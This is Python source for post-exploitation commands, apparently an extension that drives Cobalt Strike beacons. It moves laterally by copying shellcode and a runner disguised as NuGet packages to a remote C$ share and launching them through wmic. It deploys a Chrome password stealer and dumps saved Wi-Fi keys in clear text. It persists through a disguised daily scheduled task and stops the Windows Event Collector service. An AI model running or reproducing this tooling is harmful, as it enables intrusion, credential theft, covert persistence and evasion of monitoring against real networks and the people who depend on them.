def lateral_wmi_shellcode(bid, host, shellcode, user=None, password=None): native_helper = utils.basedir('tools/native.exe') temp_relative = 'WINDOWS' temp_remote = r'\\{}\C$\{}'.format(host, temp_relative) temp_local = r'C:\{}'.format(temp_relative) native_helper_relative = 'NugetPackage.{}.exe'.format(helpers.randstr()) native_helper_remote = r'{}\{}'.format(temp_remote, native_helper_relative) native_helper_local = r'{}\{}'.format(temp_local, native_helper_relative) shellcode_relative = r'nuget.{}.package'.format(helpers.randstr()) shellcode_remote = r'{}\{}'.format(temp_remote, shellcode_relative) shellcode_local = r'{}\{}'.format(temp_local, shellcode_relative) # upload helpers.upload_to(bid, native_helper, native_helper_remote, silent=True) helpers.upload_to(bid, shellcode, shellcode_remote, silent=True) # call it remote_command = '{} {}'.format(native_helper_local, shellcode_local) # TODO user/pass local_command = 'echo "{host}" & wmic /node:"{host}" '.format(host=host) if user or password: local_command += ' /user:{user} /password:{password} '.format(user=user, password=password) local_command += 'process call create "{command}","{cwd}"'.format(host=host, command=remote_command, cwd=temp_local) aggressor.bshell(bid, local_command)
def _(bid, *files): if not files: aggressor.berror('cat: specify some files to cat') return command = '\n'.join(['type {}'.format(f) for f in files]) aggressor.bshell(bid, command)
def _(bid): #temp = r'{}\AppData\Local'.format(helpers.guess_home(bid)) temp = r'{}'.format(helpers.guess_home(bid)) out_file = r'{}\c'.format(temp) dest = r'{}\temp.exe'.format(temp) helpers.upload_to(bid, utils.basedir('tools/chrome-passwords.exe'), dest) aggressor.bshell( bid, r'{} > {} & echo "Chrome credentials ready at {}. Run grab-chrome-next"' .format(cmd_quote(dest), cmd_quote(out_file), out_file))
def _(bid, profile=None): if profile: command = helpers.code_string(""" netsh wlan export profile name="{name}" folder=$env:temp key=clear $profile = $env:temp:\*{name}*.xml get-content $profile rm $profile """.format(name=profile)) aggressor.bpowerpick(bid, command) else: aggressor.bshell(bid, 'netsh wlan show profiles name="*" key=clear');
def _(bid, shellcode): local_helper = utils.basedir('tools/native_persist.exe') appdata = helpers.guess_appdata(bid) nuget_dir = r'{}\NuGet'.format(appdata) remote_helper = r'{}\NugetManager.exe'.format(nuget_dir) aggressor.bmkdir(bid, nuget_dir) helpers.upload_to(bid, shellcode, r'{}\nuget.package'.format(nuget_dir)) helpers.upload_to(bid, local_helper, remote_helper) aggressor.bshell( bid, 'schtasks /create /f /tn NugetUpdate /sc daily /tr {}'.format( remote_helper))
def _(bid): aggressor.bshell(bid, 'nslookup myip.opendns.com. resolver1.opendns.com')
def _(bid): aggressor.bshell(bid, 'wmic product get Name,Version,Description')
def _(bid, *args): command = ' '.join(args) aggressor.bshell(bid, command)
def _(bid): aggressor.bshell(bid, 'echo pong')
def _(bid, host): aggressor.bshell(bid, 'nslookup "{}"'.format(host))
def _(bid): aggressor.btask(bid, 'Tasked beacon to get WANIP via DNS') aggressor.bshell(bid, 'nslookup myip.opendns.com. resolver1.opendns.com', silent=True)
def _(bid): aggressor.btask(bid, 'Tasked beacon to get list of applications') aggressor.bshell(bid, 'wmic product get Name,Version,Description', silent=True)
def finish(text): for bid in bids: aggressor.bshell(bid, text)
def _(bid): aggressor.bshell(bid, "sc stop wecsvc")